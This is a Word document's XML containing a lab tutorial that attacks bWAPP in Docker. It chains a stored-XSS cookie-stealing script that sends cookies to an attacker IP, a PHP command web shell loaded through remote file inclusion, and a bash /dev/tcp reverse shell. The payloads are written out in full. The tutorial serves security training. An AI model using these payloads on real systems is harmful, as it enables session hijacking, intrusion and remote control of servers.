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48" w:rsidRDefault="004A6783">
      <w:pPr>
        <w:pStyle w:val="Titlu1"/>
      </w:pPr>
      <w:r>
        <w:t>Complete Tutorial: XSS-Based Session Hijacking and RFI Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:pPr>
        <w:pStyle w:val="Titlu2"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:r>
        <w:t xml:space="preserve">This document provides a comprehensive tutorial on exploiting a combination of </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Stored Cross-Site Scripting (XSS) for session hijacking and Remote File Inclusion (RFI) for reverse </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">shell access. This tutorial uses bWAPP running inside a Docker container and assumes the attacker </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>leverages the 'evil.php' script hosted on their own mach</w:t>
      </w:r>
      <w:r>
        <w:t>ine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:pPr>
        <w:pStyle w:val="Titlu2"/>
      </w:pPr>
      <w:r>
        <w:t>Part 1: Setup the Environment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:pPr>
        <w:pStyle w:val="Titlu3"/>
      </w:pPr>
      <w:r>
        <w:t>1.1 Install Docker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:r>
        <w:t xml:space="preserve">Ensure Docker is installed on your system. If not, follow the Docker installation </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>guide for your operating system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:pPr>
        <w:pStyle w:val="Titlu3"/>
      </w:pPr>
      <w:r>
        <w:t>1.2 Pull the bWAPP Docker Image</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:r>
        <w:t>Download the bWAPP Docker image:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:r>
        <w:t>docker pull raesene/b</w:t>
      </w:r>
      <w:r>
        <w:t>wapp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:pPr>
        <w:pStyle w:val="Titlu3"/>
      </w:pPr>
      <w:r>
        <w:t>1.3 Start the bWAPP Docker Container</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:r>
        <w:t xml:space="preserve">Launch the bWAPP container: </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>docker run -d -p 8000:80 --name bwapp raesene/bwapp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:r>
        <w:t>Verify it is running:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:r>
        <w:t>docker ps</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:pPr>
        <w:pStyle w:val="Titlu2"/>
      </w:pPr>
      <w:r>
        <w:t>Part 2: Stored XSS for Session Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:pPr>
        <w:pStyle w:val="Titlu3"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 Access bWAPP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:r>
        <w:t>Visit the bWAPP login page at http://localh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ost:8000. Login with the default </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>admin credentials (Username: bee, Password: bug).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:pPr>
        <w:pStyle w:val="Titlu3"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 Create a Victim Account (aaa/aaa)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:r>
        <w:t>1. Navigate to the 'Create User' section.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>2. Register a new user with the following credentials:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">   - Username: aaa</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">   - Password: aaa</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:pPr>
        <w:pStyle w:val="Titlu3"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 Exploit Stored XSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:r>
        <w:t>1. Login as 'aaa aaa'.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>2. Navigate to a page vulnerable to Stored XSS (e.g., http://localhost:8000/xss_stored.php).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3. Inject the following malicious script in a comment field:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>&lt;script&gt;document.location='http://</w:t>
      </w:r>
      <w:r w:rsidR="00BF4F2C">
        <w:t>10.0.2.15</w:t>
      </w:r>
      <w:r>
        <w:t>:9999/s</w:t>
      </w:r>
      <w:r>
        <w:t>teal?cookie='+document.cookie;&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Replace </w:t>
      </w:r>
      <w:r w:rsidR="00BF4F2C">
        <w:t>10.0.2.15</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with your attacker machine's IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:pPr>
        <w:pStyle w:val="Titlu3"/>
      </w:pPr>
      <w:r>
        <w:t>2.4 Host the Listener for Stolen Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:r>
        <w:t>Create a simple Python server to capture cookies:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mkdir xss_listener</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>cd xss_listener</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>python -m http.server 9999</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t>Leave this server running to capture requests.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:pPr>
        <w:pStyle w:val="Titlu3"/>
      </w:pPr>
      <w:r>
        <w:t>2.5 Hijack the Session of bee/bug</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:r>
        <w:t>1. Wait for the admin ('bee bug') to log in and visit the infected page.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>2. The malicious script sends the admin's session cookie to your server.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>3. Extract the session cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> value from the logs of your Python server.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>4. Edit the session cookie in your browser's developer tools to impersonate the admin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:pPr>
        <w:pStyle w:val="Titlu2"/>
      </w:pPr>
      <w:r>
        <w:t>Part 3: Remote File Inclusion (RFI) Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:pPr>
        <w:pStyle w:val="Titlu3"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 Enable RFI in PHP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:r>
        <w:t>Enter the Docker container:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>docker exec -it bwapp /bin</w:t>
      </w:r>
      <w:r>
        <w:t>/bash</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Edit the PHP configuration file:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>vi /etc/php/7.0/apache2/php.ini</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Modify these settings:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>allow_url_include = On</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>allow_url_fopen = On</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Restart Apache:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>service apache2 restart</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:pPr>
        <w:pStyle w:val="Titlu3"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 Host the Malicious PHP Script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:r>
        <w:t>Create 'evil.php' on your attacker machine:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>echo "&lt;?php if (isset(\$_GET['cmd'])) { system(\$_GET['cmd']); } else { echo 'RFI Proof of Concept'; } ?&gt;" &gt; evil.php</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Host it using Python:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>python -m http.server 9999</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:pPr>
        <w:pStyle w:val="Titlu3"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 Test the RFI Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:r>
        <w:t>Visit the RFI vulnerable page:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>http://localhost:8000/rlf</w:t>
      </w:r>
      <w:r>
        <w:t>i.php</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Inject the malicious URL:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>http://localhost:8000/rlfi.php?language=http://</w:t>
      </w:r>
      <w:r w:rsidR="00BF4F2C">
        <w:t>10.0.2.15</w:t>
      </w:r>
      <w:r>
        <w:t>:9999</w:t>
      </w:r>
      <w:r>
        <w:t>/evil.php&amp;cmd=who</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>mi</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:pPr>
        <w:pStyle w:val="Titlu3"/>
      </w:pPr>
      <w:r>
        <w:t>3.4 Start a Reverse Shell Listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:r>
        <w:t>On your attacker machine, start a Netcat listener:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>nc -lvp 4444</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:pPr>
        <w:pStyle w:val="Titlu3"/>
      </w:pPr>
      <w:r>
        <w:t>3.5 Trigger the Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7748" w:rsidRDefault="004A6783">
      <w:r>
        <w:t>Use the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> following payload:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>http://localhost:8000/rlfi.php?language=http://</w:t>
      </w:r>
      <w:r w:rsidR="00BF4F2C">
        <w:t>10.0.2.15</w:t>
      </w:r>
      <w:r>
        <w:t>:9999/evil.php&amp;cmd=/bin/bash%20-c%20%22bash%20-i%20%3E%20/dev/tcp/</w:t>
      </w:r>
      <w:r w:rsidR="00BF4F2C">
        <w:t>10.0.2.15</w:t>
      </w:r>
      <w:r>
        <w:t>/4444%</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>200%3E%261%22</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Replace </w:t>
      </w:r>
      <w:r w:rsidR="00BF4F2C">
        <w:t>10.0.2.15</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with your attacker machine’s IP.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00BE7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783"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00BE7748"/>
    <w:rsid w:val="00BF4F2C"/>
    <w:rsid w:val="00CA1E39"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00ED3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D0FF52-D6CF-4E7F-BD49-631B22A9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ACD07-87DE-414A-90F6-09BE8988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468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Cont Microsoft</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-15T19:09:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>